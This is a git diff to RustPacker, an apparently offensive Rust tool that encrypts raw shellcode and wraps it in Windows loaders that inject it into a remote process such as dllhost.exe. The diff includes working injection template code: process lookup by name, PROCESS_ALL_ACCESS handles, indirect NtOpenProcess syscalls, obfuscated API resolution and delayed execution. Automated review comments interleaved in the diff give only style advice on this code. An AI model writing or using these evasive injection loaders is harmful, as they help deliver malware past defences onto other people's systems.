diff --git a/README.md b/README.md index e9e6313..ddc6f09 100644 --- a/README.md +++ b/README.md @@ -140,15 +140,6 @@ podman run --rm -v %cd%/shared:/usr/src/RustPacker/shared:z rustpacker RustPacke -f shared/payload.raw -i ntcrt -e aes -b exe -t notepad.exe ``` -### Troubleshooting (Windows) - -| Issue | Solution | -|-------|----------| -| `podman: command not found` | Ensure Podman Desktop is running and `podman` is in your PATH | -| `docker: command not found` | Ensure Docker Desktop is running | -| Container build fails | Check that your container runtime's VM/WSL is started | -| Permission errors on volume mounts | Run your terminal as Administrator, or check Docker Desktop file sharing settings | - ## 📖 Command Line Options ``` @@ -222,7 +213,7 @@ rustpacker -f shared/payload.raw -i ntcrt -e aes -b exe -o shared/my_binary.exe ### Process Injection Templates -These templates inject shellcode into a remote process. Use `-t ` to specify the target (default: `dllhost.exe`). The target process name is **case sensitive**. +These templates inject shellcode into a remote process. Use `-t ` to specify the target (default: `dllhost.exe`). | Template | API Level | Indirect Syscalls | Dynamic API | Description | |----------|-----------|:-----------------:|:-----------:|-------------| @@ -320,8 +311,9 @@ Contributions are welcome! Here's how you can help: - [x] Indirect syscalls for fiber templates - [x] Cross-platform support (Linux, Windows, macOS) - [ ] String encryption (litcrypt) -- [ ] Binary signing support -- [ ] Mutex/Semaphore support +- [ ] Check DLL support for all templates +- [ ] Add EarlyCascade injection template +- [ ] Add DLL proxying support ## 🙏 Acknowledgments diff --git a/src/puzzle.rs b/src/puzzle.rs index 0199fc8..feeee9f 100644 --- a/src/puzzle.rs +++ b/src/puzzle.rs 
@@ -92,7 +92,7 @@ fn build_encrypted_output(order: &Order, src_dir: &Path) -> (EncryptionOutput, S let include_path = format!("\"{}\"", filename); let output = match order.encryption { - Encryption::Xor => encrypt_xor(&order.shellcode_path, &path, random_u8()), + Encryption::Xor => encrypt_xor(&order.shellcode_path, &path, non_zero_random_key()), Encryption::Aes => { encrypt_aes(&order.shellcode_path, &path, &random_aes_key(), &random_aes_iv()) } @@ -147,10 +147,13 @@ fn apply_dll_format( replacements.insert("{{DLL_FORMAT}}", dll_cargo_conf.to_string()); let dll_main_fn = r#" + const DLL_PROCESS_ATTACH: u32 = 1; + const DLL_PROCESS_DETACH: u32 = 0; + #[no_mangle] #[allow(non_snake_case, unused_variables, unreachable_patterns)] extern "system" fn DllMain( - dll_module: u32, + dll_module: usize, call_reason: u32, _: *mut ()) -> bool diff --git a/src/tools.rs b/src/tools.rs index e8ae48a..363a4d8 100644 --- a/src/tools.rs +++ b/src/tools.rs @@ -152,10 +152,14 @@ mod tests { #[test] fn test_absolute_path_already_absolute() { - let path = Path::new("/tmp/test"); + let path = if cfg!(windows) { + Path::new("C:\\tmp\\test") + } else { + Path::new("/tmp/test") + }; let result = absolute_path(path).unwrap(); assert!(result.is_absolute()); - assert_eq!(result, Path::new("/tmp/test")); + assert_eq!(result, path); } #[test] diff --git a/templates/ntCRT/Cargo.toml b/templates/ntCRT/Cargo.toml index e32e2ce..b4218f2 100644 --- a/templates/ntCRT/Cargo.toml +++ b/templates/ntCRT/Cargo.toml @@ -9,7 +9,7 @@ edition = "2021" [dependencies] sysinfo = "0.38" -winapi = { version = "0.3", features = ["ntdef", "ntstatus", "impl-default", "lmaccess", "libloaderapi"] } +winapi = { version = "0.3", features = ["ntdef", "ntstatus", "impl-default", "libloaderapi", "winnt"] } {{DEPENDENCIES}} [profile.release] diff --git a/templates/ntCRT/src/main.rs b/templates/ntCRT/src/main.rs index c69b222..af2d509 100644 --- a/templates/ntCRT/src/main.rs +++ b/templates/ntCRT/src/main.rs 
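Review bot: The new `non_zero_random_key()` call removes the zero key that would have left the payload byte-for-byte unchanged, but the arm still says nothing about what the helper returns or why zero is excluded; a comment on the arm would carry that, e.g. `// XOR: single-byte key, never 0 (which would leave the input unchanged); with only 256 possible keys this is obfuscation, not encryption`. Assuming `non_zero_random_key()` still yields the `u8` that `encrypt_xor` previously took from `random_u8()`, a name such as `non_zero_random_u8` would make the key width visible at the call site, since `random_aes_key()` on the arm below returns a different kind of key. `build_encrypted_output` starts and ends outside the hunk, and the helper itself is not in the diff, so I cannot confirm its return type here.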
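Review bot: The two new `const` items emitted into the generated `DllMain` carry no comment saying where the values come from or why they are spelled out rather than imported; because the same template text is spliced into crates that bind Windows through different crates (winapi in ntCRT/sysCRT, `windows` in winCRT, per the other files in this diff), a comment such as `// DLL_PROCESS_ATTACH/DETACH as defined in winnt.h; declared locally so the entry point does not depend on a particular bindings crate` would record that. The change of `dll_module` from `u32` to `usize` is the right width for a module handle on 64-bit targets and deserves its own one-liner, `// HINSTANCE is pointer-sized`. Only the attach/detach reasons are declared, and the `#[allow(... unreachable_patterns)]` suggests a `match` on `call_reason` follows, but the body of `DllMain` and the rest of `apply_dll_format` are outside the hunk.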
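Review bot: The platform branch in `test_absolute_path_already_absolute` repeats `Path::new` in both arms and escapes every backslash in the Windows literal; selecting the string first and using a raw literal reads more directly: `let path = Path::new(if cfg!(windows) { r"C:\tmp\test" } else { "/tmp/test" });`. Comparing `result` against `path` instead of the hard-coded Unix path is the right fix, though on Windows the assertion only holds if `absolute_path` returns an already-absolute input unchanged rather than, say, a `\\?\`-prefixed form — `absolute_path` is not in the diff, so I cannot confirm that. The enclosing `mod tests` begins before the hunk.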
@@ -2,14 +2,13 @@ #![allow(non_snake_case)] use sysinfo::System; -use std::ffi::{CString, OsStr}; +use std::ffi::CString; use std::include_bytes; use std::ptr::null_mut; use winapi::{ um::{ - winnt::{MEM_COMMIT, PAGE_READWRITE, MEM_RESERVE, PAGE_EXECUTE_READ, THREAD_ALL_ACCESS}, - lmaccess::ACCESS_ALL, + winnt::{MEM_COMMIT, PAGE_READWRITE, MEM_RESERVE, PAGE_EXECUTE_READ, THREAD_ALL_ACCESS, PROCESS_ALL_ACCESS}, libloaderapi::{GetModuleHandleA, GetProcAddress}, }, shared::{ @@ -63,8 +62,11 @@ type FH = unsafe extern "system" fn(u32, *const i64) -> i32; fn boxboxbox(tar: &str) -> Vec { let mut dom: Vec = Vec::new(); let s = System::new_all(); - for pro in s.processes_by_exact_name(OsStr::new(tar)) { - dom.push(usize::try_from(pro.pid().as_u32()).unwrap()); + let tar_lower = tar.to_lowercase(); + for (_, pro) in s.processes() { + if pro.name().to_string_lossy().to_lowercase() == tar_lower { + dom.push(usize::try_from(pro.pid().as_u32()).unwrap()); + } } dom } @@ -105,7 +107,7 @@ fn enhance(mut buf: Vec, tar: usize) { let f_protect: FD = std::mem::transmute(g(OBF_D)); let f_thread: FE = std::mem::transmute(g(OBF_E)); - let s = f_open(&mut process_handle, ACCESS_ALL, &mut oa, &mut ci); + let s = f_open(&mut process_handle, PROCESS_ALL_ACCESS, &mut oa, &mut ci); if !NT_SUCCESS(s) { return; } pause(150); diff --git a/templates/sysCRT/Cargo.toml b/templates/sysCRT/Cargo.toml index c8c241b..b303582 100644 --- a/templates/sysCRT/Cargo.toml +++ b/templates/sysCRT/Cargo.toml @@ -11,7 +11,7 @@ edition = "2021" rust_syscalls = { git = "https://github.com/Nariod/rust_syscalls", features = ["_INDIRECT_"] } sysinfo = "0.38" ntapi = { version = "0.4", features = ["impl-default"] } -winapi = { version = "0.3", features = ["ntdef", "ntstatus", "impl-default", "lmaccess"] } +winapi = { version = "0.3", features = ["ntdef", "ntstatus", "impl-default", "winnt"] } {{DEPENDENCIES}} [profile.release] 
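Review bot: `for (_, pro) in s.processes()` destructures each map entry only to drop the key; `for pro in s.processes().values()` says the same thing without the placeholder, and the identical pattern appears in the sysCRT and winCRT `boxboxbox` hunks below. Inside the loop, `pro.name().to_string_lossy().to_lowercase()` builds two owned strings per running process, which is cheap enough here, but if the intent is to mirror Windows-style case folding a comment should say so, since `str::to_lowercase` applies Unicode rules rather than the file system's own table: `// case-insensitive match: Windows image names are not case sensitive`. The function has no doc comment; `/// PIDs of every running process whose name equals `tar`, compared case-insensitively.` above `fn boxboxbox` would also document the behaviour change that the README hunk in this diff relies on. The hunk covers the whole function.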
diff --git a/templates/sysCRT/src/main.rs b/templates/sysCRT/src/main.rs index 3e2926b..1a7de5d 100644 --- a/templates/sysCRT/src/main.rs +++ b/templates/sysCRT/src/main.rs @@ -2,14 +2,12 @@ #![allow(non_snake_case)] use sysinfo::System; -use std::ffi::OsStr; use std::include_bytes; use rust_syscalls::syscall; use winapi::{ um::{ - winnt::{MEM_COMMIT, PAGE_READWRITE, MEM_RESERVE}, - lmaccess::{ACCESS_ALL} + winnt::{MEM_COMMIT, PAGE_READWRITE, MEM_RESERVE, PROCESS_ALL_ACCESS} }, shared::{ ntdef::{OBJECT_ATTRIBUTES, HANDLE, NT_SUCCESS} @@ -34,8 +32,11 @@ use std::time::Instant; fn boxboxbox(tar: &str) -> Vec { let mut dom: Vec = Vec::new(); let s = System::new_all(); - for pro in s.processes_by_exact_name(OsStr::new(tar)) { - dom.push(usize::try_from(pro.pid().as_u32()).unwrap()); + let tar_lower = tar.to_lowercase(); + for (_, pro) in s.processes() { + if pro.name().to_string_lossy().to_lowercase() == tar_lower { + dom.push(usize::try_from(pro.pid().as_u32()).unwrap()); + } } dom } @@ -69,7 +70,7 @@ fn enhance(mut buf: Vec, tar: usize) { }; unsafe { - let s = syscall!("NtOpenProcess", &mut process_handle, ACCESS_ALL, &mut oa, &mut ci); + let s = syscall!("NtOpenProcess", &mut process_handle, PROCESS_ALL_ACCESS, &mut oa, &mut ci); if !NT_SUCCESS(s) { return; } pause(150); diff --git a/templates/winCRT/src/main.rs b/templates/winCRT/src/main.rs index ff09c70..b77765e 100644 --- a/templates/winCRT/src/main.rs +++ b/templates/winCRT/src/main.rs @@ -2,7 +2,6 @@ #![allow(non_snake_case)] use sysinfo::System; -use std::ffi::OsStr; use windows::Win32::System::Diagnostics::Debug::WriteProcessMemory; use windows::Win32::System::Memory::VirtualAllocEx; use windows::Win32::System::Memory::VirtualProtectEx; 
@@ -23,8 +22,11 @@ use std::thread; fn boxboxbox(tar: &str) -> Vec { let mut dom: Vec = Vec::new(); let s = System::new_all(); - for pro in s.processes_by_exact_name(OsStr::new(tar)) { - dom.push(usize::try_from(pro.pid().as_u32()).unwrap()); + let tar_lower = tar.to_lowercase(); + for (_, pro) in s.processes() { + if pro.name().to_string_lossy().to_lowercase() == tar_lower { + dom.push(usize::try_from(pro.pid().as_u32()).unwrap()); + } } dom }